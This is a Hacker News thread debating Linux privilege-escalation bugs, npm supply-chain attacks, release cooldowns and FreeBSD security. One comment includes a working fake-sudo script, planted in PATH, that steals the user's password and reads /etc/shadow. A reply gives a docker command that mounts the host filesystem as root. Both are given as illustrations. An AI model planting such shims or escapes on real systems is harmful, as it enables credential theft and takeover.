      This means that there is a significantly greater chance that whatever software you download (not necessarily npm-based) on the internet in these couple days has been unknowingly infected with backdoors, simply due to the fact that the vast majority of servers out there that use npm code have easily exploitable vulnerabilities.

  • dingocat 17 hours ago

    You're throwing the baby out with the bathwater, though. Waiting a week still prevents a decent amount of attacks. Not every attack can evade detection for two weeks. Even if it did, security scanning tools might still detect them.

    Say, hypothetically, that 20% of attacks slip through. That's still worrying, but you'd mitigate 80% of attacks by just waiting a week. It's a low-risk, high-reward strategy.

  • Nathanba a day ago

    well then let's wait a month or even two months. The point of the wait period is primarily to avoid the new installation of exploits, not the execution of already installed exploits.

  • whazor a day ago

    A popular package has more exposure. When the artefact is published, the entire world can see it. Hopefully some people check the diff between versions. But without any delay, you could be hit by exploits nobody has seen yet.

  • chakintosh a day ago

    Yeah, Stuxnet was dormant for a year until execution.

  • fny a day ago

    This is why cooldowns have space for patches.

  • dnaaun a day ago

    Every dependency compromise that I can remember "in the past few months" was discovered in hours, if not minutes (litellm, axios, bitwarden CLI, Checkmarx docker images, PyTorch Lightning, intercom/intercom-php). What's more, the discovery of these compromises did not at all rely on whether the compromises were actively used.

    That's why I don't understand:

    > If everyone starts waiting a week, their exploits will wait 2 weeks

cperciva a day ago

Alternatively, switch to an operating system like FreeBSD which doesn't take a YOLO approach to security. Security fixes don't just get tossed into the FreeBSD kernel without coordination; they go through the FreeBSD security team and we have binary updates (via FreeBSD Update, and via pkgbase for 15.0-RELEASE) published within a couple minutes of the patches hitting the src tree. (Roughly speaking, a few seconds for the "I've pushed the patches" message to go out on slack, 10-30 seconds for patches to be uploaded, and up to a minute for mirrors to sync).
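
On the consumer side, that amounts to something like this on a -RELEASE system:

    # fetch and apply binary security/errata updates
    freebsd-update fetch
    freebsd-update install
    # kernel updates need a reboot to take effect
    shutdown -r now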

  • gucci-on-fleek a day ago

    I'm somewhat skeptical here, because I notified the FreeBSD security team of a vulnerability a few years ago, and I never got a response, even after a follow-up email a few weeks later. To be fair, my report was about a non-core component, and the vulnerability wouldn't be very easy to exploit, but Debian, OpenBSD, SUSE, and Gentoo all patched it within a week [0].

    That being said, I'm not suggesting that anyone should judge an entire OS based off of how they handle a single minor report, since everything else that I've seen suggests that FreeBSD takes security reports quite seriously. But then you could also use this same argument for the Linux kernel bug, since it's pretty rare for a patch to be mismanaged like this there too :)

    [0]: https://www.maxchernoff.ca/p/luatex-vulnerabilities#timeline

    • stingraycharles a day ago

      Linux Kernel doesn’t differentiate between security bugs and other bugs, which is the main complaint here I think. They have the same process.

      So the issue is bigger than the mishandling of a single issue, it’s a fundamental process issue around security for one of the most impactful projects in the entire space.

  • landr0id a day ago

    FreeBSD didn’t have user land ASLR until 2019 and, amongst other mitigations, still doesn’t have kASLR. It’s not a serious operating system for people who care about security. If you want FreeBSD and security take Shawn Webb’s HardenedBSD.

    • kelnos a day ago

      Last I read, ASLR is a good thing to have, but overall is usually not difficult to defeat. It's a speed bump, not a brick wall.

      I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.

      • landr0id a day ago

        >Last I read, ASLR is a good thing to have, but overall is usually not difficult to defeat.

        For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.

        >I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.

        When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement that doesn't necessarily require changes from existing code other than compiling with -pie.
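
        (For reference, a quick way to check whether a given binary was built position-independent; "DYN" means it can be relocated, "EXEC" means a fixed load address:)

            readelf -h /bin/ls | grep Type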

    • abrookewood a day ago

      Is there anywhere that provides a good overview of the various OS protection technologies/approaches that exist and which OSes have implemented them?

    • user3939382 a day ago

      So you have one example in hand and trash talked FreeBSD’s entire security team. Bold claims are fine but this is lazy.

      If FreeBSD isn’t secure, I suspect you’re sitting on a pile of 0-days for it?

      • landr0id a day ago

        Ask yourself why Mythos was so easily able to exploit a remote STACK buffer overflow vulnerability.

        • nozzlegear a day ago

          Define "so easily"?

          • landr0id a day ago

            They exploited a linear stack buffer overflow. Not a write-what-where or arb write. A linear stack buffer overflow in 2026! There are at least two distinct failures there:

            1. No strong stack protectors.

            2. No kASLR.

            That's 20-year-old exploit methodology.

  • krupan a day ago

    If you are switching to a BSD for security reasons, why FreeBSD? Isn't OpenBSD the super secure one? Sorry, it's been a while since I've looked at those projects

    • loloquwowndueo a day ago

      The person suggesting FreeBSD is a FreeBSD developer (Colin Percival - actually according to Wikipedia FreeBSD engineering lead), would be weird for him to suggest openbsd.

      • Rendello a day ago

        I'm reminded of another legendary HN thread:

        https://news.ycombinator.com/item?id=35079

        • guiambros a day ago

          Also hilarious to see Drew Houston responding a bit later on the same thread:

          > we're in a similar space -- http://www.getdropbox.com (and part of the yc summer 07 program) basically, sync and backup done right (but for windows and os x). i had the same frustrations as you with existing solutions.

          > let me know if it's something you're interested in, or if you want to chat about it sometime.

          >drew (at getdropbox.com)

        • liamwire a day ago

          It may well have been your point, but that it's the exact same person makes this even better

          • Rendello 6 hours ago

            It was, yes. I was trying to figure a way to bring it up but I didn't want to imply that the comment here was ignorant for not knowing the account. It's the opposite, HN accounts have so little fanfare and we all talk in the same threads, it's fun!

    • andai a day ago

      I haven't switched to BSD but I've been thinking about it for a while. I just saw Vultr has both FreeBSD and OpenBSD!

  • tclancy a day ago

    There’s always a guy. It’s great that your favorite distro is definitely safer. An order of magnitude fewer exploits will mean only a few thousand or so, I suppose. Ozymandias used Gentoo.

    • dag100 a day ago

      Calling FreeBSD "just a distro" is verging on insulting. It's an operating system.

      • tclancy 21 hours ago

        Apologies, "OS". I am not a native speaker of whatever place that considers these fightin' words.

      • pocksuppet 20 hours ago

        Distros are operating systems.

        • dag100 8 hours ago

          But operating systems are not distros.

          Less laconically, distros generally refer to the userland parts of the operating systems rather than the actual kernel. FreeBSD does not use the Linux kernel so calling it a distro, which typically refer specifically to Linux distros, wouldn't be accurate.

    • shakna a day ago

      Well, as they're a FreeBSD dev, I would be surprised if they pointed anyone in a different direction.

    • LoganDark a day ago

      FreeBSD is not a distro. It's not even Linux; it's a completely different kernel and operating system that traces back to even before Linux. It's honestly closer to Darwin than it is to Linux; macOS is technically a BSD. (Not FreeBSD though.)

      • steve1977 a day ago

        Darwin is its own thing really. There are parts from BSD, there are also parts from Mach and there are also unique parts.

        • LoganDark 13 hours ago

          Of course. Linux does not share any heritage with BSD though.

          • Melatonic 13 hours ago

            Except that they are both based on Unix and (generally) made to run on x86 processors. Which is a pretty big similarity

            • LoganDark 8 hours ago

              Linux is not based on Unix. AFAIK it was inspired by Unix, but does not actually share anything.

    • GalaxyNova a day ago

      FreeBSD is not a distro

      • stackghost a day ago

        What does the D in BSD stand for again?

        • tom_alexander a day ago

          That's more of a historical artifact. The BSDs started as just "BSD": a set of patches for AT&T Unix that were _distributed_ by Berkeley. Eventually the patches became complete enough to be an entire operating system. _Then_ the various BSDs that we know today (FreeBSD, OpenBSD, NetBSD, DragonflyBSD) all forked and became completely independent operating systems. For decades, FreeBSD's kernel and userland has been developed independently from the OpenBSD kernel and userland which is developed independently from NetBSD's kernel and userland, etc. You could not take an OpenBSD program and run it on FreeBSD. Even recompilation from source isn't necessarily enough since the BSDs support different syscalls.

          They are completely independent operating systems with a distant shared history.

          Whereas on Linux, the distros are taking a common Linux kernel source, and combining it with their choice of common userlands like GNU. Debian has the same kernel and GNU userland that Arch and Fedora use. You could take a program compiled for Debian and run it on Arch, which is common these days due to Docker where you're pulling another distro's userland and running it on your distro's kernel. That is how Linux distros are "distros" whereas the BSDs are independent operating systems.

        • shaky-carrousel a day ago

          Distribution. Which is a different word than distro, with a different meaning. Like smart and smartass.

          • einsteinx2 a day ago

            While you’re correct that FreeBSD is not a Linux distribution, the word “distro” is literally short for distribution. It doesn’t have a different meaning like smart and smartass, it’s more like repo and repository.

        • beng-nl a day ago

          Distribution. But it’s not a Linux distribution.

  • dijit a day ago

    FreeBSD is quite lax when it comes to security- especially defaults and configs.

    The preference is for usability over security.

    Famously: https://vez.mrsk.me/freebsd-defaults

    I appreciate your work on the project, but I can’t in good conscience suggest people switch while there are such bad defaults.

  • eahm a day ago

    Also funny they never show Debian in those tests/videos.

    • cperciva a day ago

      Debian is probably the best of all the Linuxes, but still suffers from split-brain: If patches are sent upstream first, Debian can't start digesting them until they're already public.

      With FreeBSD there's never any question of "who should this get reported to".

      • JoshTriplett a day ago

        > Debian can't start digesting them until they're already public

        Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.

        Is there some other aspect of this that you're referencing?

        • cperciva a day ago

          The key words there are "when they're actually coordinated". Debian doesn't own the Linux kernel, and the kernel developers don't bother with coordinated disclosure, so the happy path of coordinated disclosure only happens when reporters make the non-obvious choice of reporting vulnerabilities to people other than the maintainers.

          • JoshTriplett a day ago

            Fair enough; yeah, at the point where the embargo failed, it was important that patches get to distros as fast as possible in order to ship the fixes.

        • pavon a day ago

          The fact that the kernel security team has decided coordinating disclosure is someone else's problem so it happens inconsistently.

      • goodpoint 20 hours ago

        No, Debian has its own security team and receives embargoed vulnerabilities and patches.

    • juujian a day ago

      How so?

  • homebrewer a day ago

    Has everyone here already forgotten about the WireGuard tire fire?

    https://lwn.net/Articles/850098

    https://news.ycombinator.com/item?id=26507507

    tl;dr: deeply insecure WireGuard implementation committed directly into the FreeBSD kernel with zero review.

    Was this process problem fixed?

  • f30e3dfed1c9 a day ago

    Been constructing a lot of infrastructure servers recently, almost all of them FreeBSD VMs running under bhyve on FreeBSD physical hosts. It's a very simple, clean, pleasant environment to work in. And they all run tarsnap. ;-)

  • voidUpdate 21 hours ago

    I've kept hearing about BSD recently, how hard is it to actually switch to? I'm guessing Linux executables don't work on it since it's not Linux, do all your packages have to be made specifically for BSD?

    • brewmarche 19 hours ago

      My experiences from dabbling with it a few months ago:

      In general everything needs to be compiled for FreeBSD, but the ports collection is quite extensive. For example you will find Firefox, wayland, GNOME, KDE, xfce, … even dotnet was on there.

      Problems arise with proprietary stuff like Spotify, Widevine DRM etc. However, FreeBSD has a Linux emulation layer (providing syscalls), dubbed ‘Linuxulator’. I managed to run the Spotify Linux desktop client but the Spotify website wouldn’t let me log in, didn’t research further. AFAIK the emulator is limited though, not implementing all syscalls.

      There is also podman for FreeBSD and in addition to running FreeBSD containers (using Jails under the hood I guess?) it can run Linux containers as well (using the Linuxulator in addition then?).

      It also comes with a hypervisor called bhyve if you want to run VMs

      There is a handbook on their website describing how to set up a system (including desktop environment) if you want to give it a go.

    • SV_BubbleTime 19 hours ago

      If you are asking, it’s not for you.

  • ComplexSystems a day ago

    While I am sure FreeBSD is more secure than your average Linux distro, I sure hope they are using these new AI models to harden everything.

  • pjmlp a day ago

    Only to be thrown out of the windows with a plain "curl | sh".

    • skydhash a day ago

      curl | sh is more prevalent in Linux where you can expect a stable ABI from the kernel and sometimes GNU libc. No such things in BSD land. Packages are built against a release always. They don't maintain binary compatibility.

      • pjmlp a day ago

        Hardly an argument against random shell scripts execution, quite often elevated.

        Not everyone installs only what is available in pkgsrc.

  • bananamogul a day ago

    FreeBSD just slaps at the problem. OpenBSD solves it.

    I kid, I kid...

AgentME a day ago

There's already an okay solution to supply-chain attacks against dependency managers like npm, PyPI, and Cargo: set them to only install package versions that are more than a few days old. The recent high-profile attacks were all caught and rolled back within a day, so doing this would have let you safely avoid the attacks. It really should be the default behavior. Let self-selected beta testers and security scanner companies try out the newest versions of packages for a day before you try them. Instructions: https://cooldowns.dev/
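
As a sketch of what that looks like for one tool (setting name and units as I understand the pnpm docs; cooldowns.dev covers the other managers):

    # pnpm 10.16+: refuse to resolve versions published in the last 7 days
    # (the value is in minutes)
    cat >> pnpm-workspace.yaml <<'EOF'
    minimumReleaseAge: 10080
    EOF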

  • edoceo a day ago

    More a case for something like this from Show HN three months ago

    https://github.com/artifact-keeper

    An artifact manager. Only get what you approve. So you can get fast updates when needed and consistently known stable when you need it. Does need a little config override - easy work.

    I had my own janky tooling for something like it. This is a good project.

    • Johnny555 a day ago

      Does that really scale well? Thanks to cascading dependencies, even a medium sized project can import hundreds of dependencies. Can a developer really review them all to figure out if they are safe and that there's not security fix that was fixed in a newer version of the package?

      • jpollock a day ago

        Yes, that is what is required. Every dependency needs an internal owner and reviewer. Every change needs to be reviewed and brought into the internal repository.

        If no one is willing to stand up and say "yes this is safe and of acceptable quality", why use it?

        It's a software engineering version of the professional engineering stamp.

      • edoceo a day ago

        I love the sibling response from @jp...

        Also, IME we don't deep dive everything (should we?)

        For most stuff we make sure the latest is not-shit and passed test cases. We do have ceremony around version bumps.

  • pjmlp a day ago

    Even better, only use company-vetted repos; everyone is forbidden from installing directly from Internet repos.

    This naturally doesn't work outside corporations.

    • ric2b 11 hours ago

      That usually ends up as proxies to the upstream repos, because the people managing the company repos don't have time to review every new version of a package.

      At that point you're just as vulnerable to a supply chain attack.

  • b112 a day ago

    So you get security updates late too? Many vulnerabilities are in the wild for years before being noticed, and patched.

    Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.

    • AgentME a day ago

      Presumably npm exempts security updates from its minimum release age, but even if it doesn't, I think the times where you need an important security update are relatively rare enough that handling the real cases on a case-by-case basis with whitelisting is fine. Outside of Next.js's React2Shell vulnerability last year, I'm not sure I've ever had a security update of a dependency written in a memory-safe language (ie. not C/C++) which I've installed through npm/PyPI/Cargo that patched a security vulnerability that had been making my application exploitable to others in practice. Almost all security vulnerabilities I've personally seen flagged through npm are about things I only use at build-time and are only relevant if a user can create and pass an arbitrary object to the function, which is rarely the case. Most security vulnerabilities I've encountered and fixed in working on web apps were things like XSS, SQL injections, and improperly enforced permissions, and they nearly always happened in the application's own code rather than inside a dependency.

      • wavemode a day ago

        > exempts security updates from its minimum release age

        If it does, doesn't that defeat the purpose? If a package is compromised, of course the compromiser will just label their new version as a "security update".

      • mattstir 21 hours ago

        > Presumably npm exempts security updates from its minimum release age

        Why would it? Then an attacker would just push compromised code as a "security update". Since the majority of these npm attacks are account-based, the attacker can do everything the actual owner could.

    • ayuhito a day ago

      At least with our Renovate config, all dependencies have a 7 day cooldown, but marked security updates are immediate.

      Attackers can’t push a security update without going through the reporting process (e.g. Github CVE), so they can’t necessarily abuse that easily.
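
      For reference, a minimal sketch of such a config (option names as in the Renovate docs; verify against your Renovate version):

          # renovate.json: 7-day cooldown for ordinary bumps,
          # while vulnerability-triggered updates stay immediate
          cat > renovate.json <<'EOF'
          {
            "packageRules": [
              { "matchManagers": ["npm"], "minimumReleaseAge": "7 days" }
            ],
            "vulnerabilityAlerts": { "enabled": true }
          }
          EOF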

    • ketozhang a day ago

      You could still have security bumps happening (like dependabot).

  • skydhash a day ago

    IMO, the most sustainable model is the Linux distro / BSD ports / Homebrew one: you don't push new libraries to the public registry; instead you write a packaging script that gets reviewed for every change.

    Another model is Perl's CPAN where you publish source files only.

    • microtonal a day ago

      Trust me, as someone who has contributed to such a package set, almost nobody is inspecting diffs between upstream versions when updating a package. Only the package definitions themselves are reviewed, but they are typically only version + hash bumps.

      Reviewing upstream diffs for every package requires a lot of man hours and most packagers are volunteers. I guess LLMs might help catching some obvious cases.

      • skydhash a day ago

        Not really talking about upstream. Most supply chain attacks I’ve heard about involve stolen secrets and uploaded artifacts, not repositories or websites being taken over. Since the packaging scripts live in repos, you can easily detect if someone is trying to change where upstream points.

XCabbage a day ago

Sorry, I don't get it. What's the chain of reasoning that connects "there are a couple of new Linux local privilege escalation exploits" to "don't install any new software"? Is the threat we're supposed to be concerned about here just a package maintainer publishing malware that uses these exploits?

(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)

  • roskilli a day ago

    Well, one thing is that a package update could smuggle in a backdoor, much like XZ Utils[1].

    The post in question points at dependency package managers such as npm, not system packages; npm has pre- and post-build scripts, install scripts, etc.

    [1] https://en.wikipedia.org/wiki/XZ_Utils_backdoor

anymouse123456 a day ago

For the newer players who have gotten into continuous integration and containerized builds, consider checking on your systems to be sure you're not pulling 'latest' across a bunch of packages with every build.

We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.

This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.
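
One concrete way to do this is pinning base images by digest instead of by tag, so a retagged image can't slip in. A minimal sketch (the digest is a placeholder for whatever `docker images --digests` reports for the image you vetted):

    # A tag like :22-alpine can be repointed upstream; a digest cannot
    FROM node:22-alpine@sha256:<digest-of-the-image-you-vetted>
    WORKDIR /app
    COPY package.json package-lock.json ./
    # npm ci installs exactly what the lock file says, at image build time
    RUN npm ci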

mastermage a day ago

What we have to start accepting, even security experts, is that our world is incredibly fragile. I think people really underestimate this. And I don't mean just the IT world; the entire world is built on many incredibly fragile balances. Security exploits will always exist, not just in software but in real life. Heck, someone managed to sneak into a security conference, and that guy was a random YouTuber. Granted, that was not a high-security event, but it's just an example I had off the top of my head. Basically, it is really easy to circumvent security in most cases.

What I want to say with that is that our world fundamentally works because at least most people do not abuse shit. That is fundamentally how human society has always worked, and will likely continue to work.

  • kaelyx a day ago

    I remember there was a trend of UK influencers using "ladder and a high-vis" tricks to enter places for a while, to show how rough physical security is [0]. I believe it's the YouTuber Max Fosh who managed to do it back to back at the International Security Expo, first in the UK [1] and then in the US [2], under the fake names 'Rob Banks' and 'Nick Everything'.

    I've studied security culture before, and in most cases everything comes down to a sliding scale with security on one side and convenience/accessibility on the other: the more secure something is, the less accessible it is, and vice versa.

    [0] https://www.youtube.com/watch?v=LTI0SeyhAPA

    [1] https://www.youtube.com/watch?v=qM3imMiERdU

    [2] https://www.youtube.com/watch?v=NmgLwxK8TvA

sergeykish a day ago

Attackers on Linux distributions do not need Copy Fail to get root access:

    # Shadow the real sudo with a fake one earlier in PATH
    echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc

    mkdir -p ~/.local/bin/
    # Note the quoted 'EOF': without it, $USER and $PASSWORD would expand
    # while writing the file instead of when the victim runs the fake sudo
    cat <<'EOF' >~/.local/bin/sudo
    #!/bin/bash
    read -rs -p "[sudo] password for $USER: " PASSWORD
    echo ""
    echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
    EOF

    chmod +x ~/.local/bin/sudo
This attacks the next sudo call and shows data accessible only to root.

Our security model is based on distributions verifying packages, that is, on distro maintainers. Software we can't trust should be running in VMs. The attack on trivy is just the beginning, and the solution is removing pip, uv, npm, rbenv from the host and running them in Docker containers:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh
Long-term environments can be defined in Docker Compose:

    # docker-compose.yml
    services:
      app:
        image: node:alpine
        volumes:
          - .:/app
        working_dir: /app
        command: /bin/sh
    $ docker compose run app
Switch to Kata Containers etc. if more protection is needed. Eventually all userspace will run in VMs.
  • kro 21 hours ago

    These copyfail exploits allow an unprivileged (daemon/app) user (not in sudoers) to get root without interaction from the original system maintainer.

    It's quite different from PATH-injecting an already privileged user.

    Also, these memory corruptions can likely be used as container escape primitives too. Albeit not easily.

    It's a serious break of a security boundary. Yes, the container layer adds defense and normal Unix security isn't perfect, but it should not allow this.

  • quectophoton a day ago

    If `docker` is already there, why even bother with `sudo` when you can just:

        docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
    
    Chances are that the person who set up Docker didn't do it properly.
    • sergeykish 21 hours ago

      Run in docker container:

          $ docker run -it -v.:/app -w /app node:alpine /bin/sh
          /app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
          /bin/sh: docker: not found
      
      I've described an attack from a host user, and isolating the attacker with Docker.
  • harrouet 20 hours ago

    Containerizing every app is what iOS / iPadOS already do.

    It is regularly pointed out as a drawback by Android users (e.g. "I can't run that doomscrolling blocker in iOS"), but from a security-model perspective it was visionary back in 2008.

andai a day ago

Can someone help me understand the copyfail thing and how it relates to NPM packages?

Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?

So now, while there are unpatched servers, is when it would be the perfect time for attackers to target NPM packages.

And the advice isn't just "update your kernel" because we are still finding new related issues?

  • ahpeeyem a day ago

    NPM supply-chain attacks spread really quickly.

    If a popular NPM package was compromised and included a copy.fail exploit, it would make lots of systems vulnerable to root privilege escalation.

  • Gigachad a day ago

    The patches for the latest vulnerabilities aren’t even out yet. So it would be a real bad time for a new supply chain attack since it would get root on pretty much every system.

  • wavemode a day ago

    > And the advice isn't just "update your kernel" because we are still finding new related issues?

    The advice isn't just "update your kernel" because there is no update. The latest vulnerability (the one discovered after copy.fail) still has no fix.

  • xena a day ago

    npm can run on linux.

abustamam 18 hours ago

This advice is good even if there weren't security vulnerabilities. When I was a junior engineer I'd install a bunch of packages just willy nilly. My manager was like "stop installing packages for simple things. Just learn how they work and code it yourself."

I've done that ever since. Of course, I still use packages like express and tailwindcss. But in the era of LLMs, using a package for something like react drop-downs is unnecessary.

Animats a day ago

I'm holding off on upgrading to Ubuntu 26.04 LTS until we have a few months of experience with the new release. Canonical just had a huge DDOS attack, and there might have been other attacks hidden in all that traffic.

antonyh a day ago

"Don't update your systems for a while" is exactly what an attacker would say.

If you can't trust your update sources, you have bigger problems.

  • moffkalast a day ago

    If I'm being really frank, are system updates not more disruptive, destructive and result in more data loss and downtime than all the attacks you'll experience in your lifetime? (unless you're a high value business target ofc, I'm talking for personal machines)

    In my book, having unattended-upgrades or windows update run amok on your system is functionally worse than a rootkit.

    • Melatonic 13 hours ago

      This is why you always have a test environment and good, tested backups that are easy and quick to roll back to. Even if something makes it past test (or there is an install problem with a patch that is otherwise fine) you can just roll back.

      For personal machines without those resources you are in a bit of a hard place, although many OSes and applications these days have long-term stable versions and the ability to defer automatic patches by a week or two.

    • antonyh a day ago

      This. Lost hours from running the updates, lost hours from the occasional faulty upgrade, and every now and again it'll fail spectacularly and need a restore from backup to return to productivity. No matter if it's Ubuntu LTS or non-LTS, every six months there's always something radically changed. openSUSE Leap has the same problem. I'm looking at Tumbleweed, but a new version every week is going to break occasionally. Gentoo build-from-source is going to have weirdness every now and again, if not utter ruin. macOS updates yearly, and brings horrors with every point-zero release. Windows is Windows, and those problems are well known. I don't think there's a way around it with the current offerings.

      It's a problem we have to live with for the sake of progress and for security updates. Every machine needs downtime for maintenance on a periodic, often-scheduled basis. It might cost time but avoiding updates is not a good plan.

      Aside from dodgy updates that have to run as root to install, passwordless sudo is more dangerous than any broken package or local-only privilege escalation exploit, and I'll wager many have it set up that way, because typing passwords is tiresome.

metaengies a day ago

Actively destructive opinion article. I could not begin to understand the rationale.

It takes 45 seconds to go check how old the copyfail and dirtyfrag vulnerabilities actually are, which is longer than it takes to read TFA. Dirtyfrag may be relevant to systems from as far back as 2017.

It's not "new" software being affected. And actual old software is in a much worse state because we had a lot more time to find their problems.

  • smallpipe a day ago

    OP is suggesting that a supply chain attack would be bad now, and to reduce that risk by not installing/updating NPM packages.

  • pocksuppet 20 hours ago

    FYI copyfail and dirtyfrag are the same vulnerability activated by two different code paths.

    It's as if Windows had a vulnerability triggered by writing a certain string to a file. Copyfail is to write the string to a file. Dirtyfrag is to get another program to write the string to a file. When you fix the vulnerability - make sure nothing strange happens when the string is written - both go away at the same time.

cbarnes99 a day ago

It really pisses me off that responsible disclosure timelines are being ignored.

  • creatonez a day ago

    In this case, no insiders broke the embargo. It was reverse engineered from the patch by an unrelated third party and a proof of concept immediately came out of it. At that point, it's kinda fair game.

    • vintermann a day ago

      I assume that while Mythos may be really good at finding vulnerabilities, lighter models may still do a pretty good job of explaining/exploiting the vulnerability if given the patch which fixes it.

      • mattstir 21 hours ago

        Maintainers attempt to reduce the likelihood of that somewhat by giving security patches boring-sounding commit messages. When there are thousands of patches for every kernel release to sift through, that adds a small barrier for would-be exploiters.

    • CodesInChaos 20 hours ago

      Aren't patches usually covered by the embargo as well, and kept private until the deadline?

      • creatonez 18 hours ago

        For proprietary software, sure. But open source projects rarely ever work like this.

        Especially for a project like the kernel, there's no reasonable way to decide who out of thousands of interested parties should have access first.

        Android is a rare exception, as of a few years ago they started a program where phone manufacturers get very favorable early access to AOSP code 4 months ahead of public release.

  • bellowsgulch a day ago

    If you don't already consider responsible disclosure a quaint idea, you may want to start warming up to that view.

    The idea that it exists at all is more or less a gentleman's agreement in the engineering world anyway.

    • Root_Denied a day ago

      Less a gentleman's agreement and more of a question of economic incentives going away. Companies aren't paying out bounties at the rates they used to (possibly because they've realized there's little financial incentive to do so for most findings) and simultaneously they're being inundated with AI slop findings that somehow have to still be triaged and evaluated.

  • roxolotl a day ago

    The dirty frag repo says:

    > Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution.

    I had to do a double take reading that. It's written as if something happened that prevented them from following the schedule, yet seemingly they chose to release the information anyway. I hope I'm missing something and it was forcibly disclosed elsewhere.

    Edit: Moments later I refreshed the homepage and saw the announcement. They do claim to have consulted with maintainers.

  • zmj a day ago

    If the fix commit is public, so is the issue being fixed.

    • jeroenhd a day ago

      With copy.fail, the security patch wasn't labeled as such, so there wasn't a lot of attention on the issue and it remained dormant in most kernels for a while.

      I don't doubt that the patch reversal + exploit PoC made by a third party is the result of people figuring out how patches work in open source projects like these.

      Anyone with access to a good enough LLM can scour supposedly minor bug fixes that might hide a critical vulnerability, rather than doing it all manually. The LLM will probably throw up tons of false positives and miss half the issues, but you only need one or two successes.

rablackburn a day ago

Literally implemented PR guards today to prevent the team merging any dependencies that didn’t have explicit versions pinned (and that matched the resolution in the lock file).

People lamented semver not being trustable but that ship sailed a long time ago, and supply chain attacks are going to get worse before they get better.

Our team is pretty minimal when it comes to enforced hooks (everyone has their own workflow) but no one could come up with an objection to this one.
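
For anyone wanting to do similar, the heart of such a guard can be a few lines (a minimal sketch assuming npm, jq, and exact-version pins; the check against the lock file's resolution is left out):

    #!/bin/bash
    # Fail if any (dev)dependency in package.json uses a range instead of an exact pin
    set -euo pipefail
    if jq -r '(.dependencies // {}) + (.devDependencies // {})
              | to_entries[] | "\(.key) \(.value)"' package.json \
       | grep -E ' [~^<>*]'; then
      echo "Unpinned dependency versions found above; pin exact versions." >&2
      exit 1
    fi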

  • clbrmbr a day ago

    Wouldn’t you prefer to pin to SHA hashes? Or does your package manager cloud-side ensure immutability of releases?

fkarg a day ago

Every single update is a lottery: you either get a new supply-chain attack or the fixes from Mythos.

golem14 a day ago

This gets me to ask whether I have been hacked. For a few weeks now, both my main MBP and iPhone have been showing unexpected hangs of 1-30 seconds. I can't find out what's causing it: not memory pressure, not CPU load.

I am worried because the sluggishness appeared at about the same time on both devices.

  • Gigachad a day ago

    For ios, rebooting your phone is extremely effective at removing exploits. The boot chain attestation stuff can verify the system is in a known state. If you are ultra paranoid you could enable lockdown mode which preemptively disables the entrypoints for exploits. So far I don't believe there has been any exploit which works with lockdown mode enabled.

    • Georgelemental a day ago

      If you are already exploited though, I doubt it helps

      • jeroenhd a day ago

        Getting persistent root is actually quite difficult on mobile operating systems. iOS famously so, but unless you're running a custom ROM other than Graphene, Android has some solid protections as well.

        Regular phone reboots are a security measure at this point.

      • Gigachad a day ago

        It does though, the exploit exists in memory. When you reboot the phone the memory is reset, if it's modified system files, the checksums won't pass and your phone will refuse to boot. Requiring it to be wiped and reinstalled.

        These days most exploits cannot persist through a reboot due to secure boot and other boot-chain attestations. In the boot process, everything loaded gets checksummed and compared against signed signatures from Apple, but this only helps at load time, not while the phone is running. Of course, if the phone is not patched, the exploit could be reloaded, but this would require revisiting a malicious website or reopening a malicious bit of media.

Melatonic 13 hours ago

This is why I usually try to lean toward software with LTS (Long Term Support) versions, especially if they are more minimalist or run leaner. Theoretically you get all the security patches (if needed; of course you can still vet and test updates) and fewer bugs and vulnerabilities, thanks to fewer new features.

Reducing attack surface and software complexity will (theoretically) reduce the number of possible exploits regardless of what new tool or process attackers discover.

KevinMS a day ago

I got rid of half of my VSCode extensions a couple days ago, its too risky.

  • BobbyTables2 a day ago

    Those things scare the crap out of me…

    Even worse are the “extension packs” that combine some normal things and one wonky thing nobody’s ever heard of…

hn_throwaway_99 18 hours ago

I always wondered why it wasn't super easy to have a version specification in NPM that basically said "give me the latest version of this dependency as of X weeks ago". That is, hijacked modules usually were revealed within a week, and there are some groups (like security researchers) that are fine with being on the bleeding edge, but a lot of more conservative companies would rather hold back a week or two.

I know there are extensions and proxies you can set up that do this, but it just seems like it should be built into npm directly (maybe it has been; I haven't been up on Node programming in the last couple of years).
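
As it happens, npm has something close to this built in: the `--before` flag resolves every package to the newest version published on or before a given date. A sketch (GNU `date`; the macOS syntax differs):

    # Install dependencies as they existed two weeks ago
    npm install --before="$(date -u -d '14 days ago' +%Y-%m-%dT%H:%M:%SZ)"

    # Or persist it project-wide in .npmrc (date is illustrative):
    # before=2026-01-01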

asdfman123 15 hours ago

Genuine question: I wonder if AI coding is responsible for the new exploits coming to light.

What AI coding is great at is helping you try out things you wouldn't normally have the time or energy to do. It shines for writing scripts that aren't part of a larger codebase, and for helping with boring, rote tasks.

Hackers are also very motivated to use new tools to find any kind of opening (unlike normal devs who aren't always as... motivated :).

femiagbabiaka a day ago

Yes, and, for non-personal machines or anything connected to the internet: now is a great time to get good at rolling out patches and new releases quickly.

  • Gigachad a day ago

    The proof of concept code is out before patches are available for any distro.

    • femiagbabiaka 20 hours ago

      Perhaps it's time to switch to paradigms that allow faster patch generation, application, and rollout... like Nix.

giwook 19 hours ago

